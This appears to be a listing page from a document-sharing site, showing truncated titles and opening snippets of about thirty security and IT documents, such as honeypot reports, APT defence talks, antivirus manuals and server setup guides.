NOC PS manual Copyright Maxnet 2009 2015 All rights reserved Page 1/45 Table of contents Installation...3 System requirements...3 Network setup...5 Installation under Vmware Vsphere...8 Installation under
Fighting Advanced Persistent Threats (APT) with Open Source Tools
Fighting Advanced Persistent Threats (APT) with Open Source Tools What is APT? The US Air Force invented the term in 2006 APT refers to advanced techniques used to gain access to an intelligence objective
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
CYCLOPE let s talk productivity
Cyclope 6 Installation Guide CYCLOPE let s talk productivity Cyclope Employee Surveillance Solution is provided by Cyclope Series 2003-2014 1 P age Table of Contents 1. Cyclope Employee Surveillance Solution
Kaspersky Internet Security
Kaspersky Internet Security User Guide APPLICATION VERSION: 16.0 Dear User, Thank you for choosing our product. We hope that this document will help you in your work and will provide answers regarding
Firewalls and Software Updates
Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General
MULTICULTURAL CONTENT MANAGEMENT SYSTEM
MULTICULTURAL CONTENT MANAGEMENT SYSTEM AT A GLANCE Language Partner s Multilingual Content Management System Meridium is multilingual content management system designed to fast track the process of multilingual
System Structures. Services Interface Structure
System Structures Services Interface Structure Operating system services (1) Operating system services (2) Functions that are helpful to the user User interface Command line interpreter Batch interface
Taxonomy of Hybrid Honeypots
2011 International Conference on Network and Electronics Engineering IPCSIT vol.11 (2011) (2011) IACSIT Press, Singapore Taxonomy of Hybrid Honeypots Hamid Mohammadzadeh.e.n 1, Masood Mansoori 2 and Roza
The Monitis Monitoring Agent ver. 1.2
The Monitis Monitoring Agent ver. 1.2 General principles, Security and Performance Monitis provides a server and network monitoring agent that can check the health of servers, networks and applications
Pentesting Mobile Applications
WEB 应 用 安 全 和 数 据 库 安 全 的 领 航 者! 安 恒 信 息 技 术 有 限 公 司 Pentesting Mobile Applications www.dbappsecurity.com.cn Who am I l Frank Fan: CTO of DBAPPSecurity Graduated from California State University as a Computer
Unified Security, ATP and more
SYMANTEC Unified Security, ATP and more TAKE THE NEXT STEP Martin Werner PreSales Consultant, Symantec Switzerland AG MEET SWISS INFOSEC! 27.01.2016 Unified Security 2 Symantec Enterprise Security Users
Mirtrak 6 Powered by Cyclope
Mirtrak 6 Powered by Cyclope Installation Guide Mirtrak Activity Monitoring Solution v6 is powered by Cyclope Series 2003-2013 Info Technology Supply Ltd. 2 Hobbs House, Harrovian Business Village, Bessborough
Virtualization Technology
Virtualization Technology A Manifold Arms Race Michael H. Warfield Senior Researcher and Analyst [email protected] 2008 IBM Corporation Food for Thought Is Virtual Reality an oxymoron or is it the
StruxureWare Data Center Expert 7.2.1 Release Notes
StruxureWare Data Center Expert 7.2.1 Release Notes Table of Contents Page # Part Numbers Affected...... 1 Minimum System Requirements... 1 New Features........ 1 Issues Fixed....2 Known Issues...2 Upgrade
Proactive Detection of Security Incidents. Honeypots 2012-11-20
2012-11-20 I Contributors to this report The report production was commissioned to CERT Polska (NASK). Authors Contributors Editor CERT Polska (NASK): Tomasz Grudziecki Paweł Jacewicz Łukasz Juszczyk Piotr
RecoveryVault Express Client User Manual
For Linux distributions Software version 4.1.7 Version 2.0 Disclaimer This document is compiled with the greatest possible care. However, errors might have been introduced caused by human mistakes or by
Intrusion Detection in AlienVault
Complete. Simple. Affordable Copyright 2014 AlienVault. All rights reserved. AlienVault, AlienVault Unified Security Management, AlienVault USM, AlienVault Open Threat Exchange, AlienVault OTX, Open Threat
Online Backup Client User Manual
Online Backup Client User Manual Software version 3.21 For Linux distributions January 2011 Version 2.0 Disclaimer This document is compiled with the greatest possible care. However, errors might have
Release Notes 7.5 [formerly IntruShield]
Release Notes Release Notes 7.5 [formerly IntruShield] Revision B Contents About this document New features Resolved issues Known issues Install and upgrade notes Find product documentation About this
Spyware Analysis. [email protected]. Security Event - April 28, 2004 Page 1
Spyware Analysis [email protected] Security Event - April 28, 2004 Page 1 Content Definition & types of spyware Statistics Hooks Static vs. dynamic software analysis Test environment for spyware Analysis
Botnets: The Advanced Malware Threat in Kenya's Cyberspace
Botnets: The Advanced Malware Threat in Kenya's Cyberspace AfricaHackon 28 th February 2014 Who we Are! Paula Musuva-Kigen Research Associate Director, Centre for Informatics Research and Innovation (CIRI)
Chapter 9 Firewalls and Intrusion Prevention Systems
Chapter 9 Firewalls and Intrusion Prevention Systems connectivity is essential However it creates a threat Effective means of protecting LANs Inserted between the premises network and the to establish
Using Nessus In Web Application Vulnerability Assessments
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security [email protected] About Tenable Nessus vulnerability scanner, ProfessionalFeed
FORBIDDEN - Ethical Hacking Workshop Duration
Workshop Course Module FORBIDDEN - Ethical Hacking Workshop Duration Lecture and Demonstration : 15 Hours Security Challenge : 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once
FileMaker Server 11. Getting Started Guide
FileMaker Server 11 Getting Started Guide 2004 2010 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker and Bento are trademarks of FileMaker,
FileMaker Server 10. Getting Started Guide
FileMaker Server 10 Getting Started Guide 2007-2009 FileMaker, Inc. All rights reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker, the file folder logo, Bento and
Detection of SQL Injection and XSS Vulnerability in Web Application
International Journal of Engineering and Applied Sciences (IJEAS) ISSN: 2394-3661, Volume-2, Issue-3, March 2015 Detection of SQL Injection and XSS Vulnerability in Web Application Priti Singh, Kirthika
Environment. Attacks against physical integrity that can modify or destroy the information, Unauthorized use of information.
Cyber Security. Environment, Solutions and Case study. Special Telecommunications Service David Gabriel, Buciu Adrian Contact: [email protected] [email protected] Environment Network/services can be damaged
FEATURE COMPARISON BETWEEN WINDOWS SERVER UPDATE SERVICES AND SHAVLIK HFNETCHKPRO
FEATURE COMPARISON BETWEEN WINDOWS SERVER UPDATE SERVICES AND SHAVLIK HFNETCHKPRO Copyright 2005 Shavlik Technologies. All rights reserved. No part of this document may be reproduced or retransmitted in
Attacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
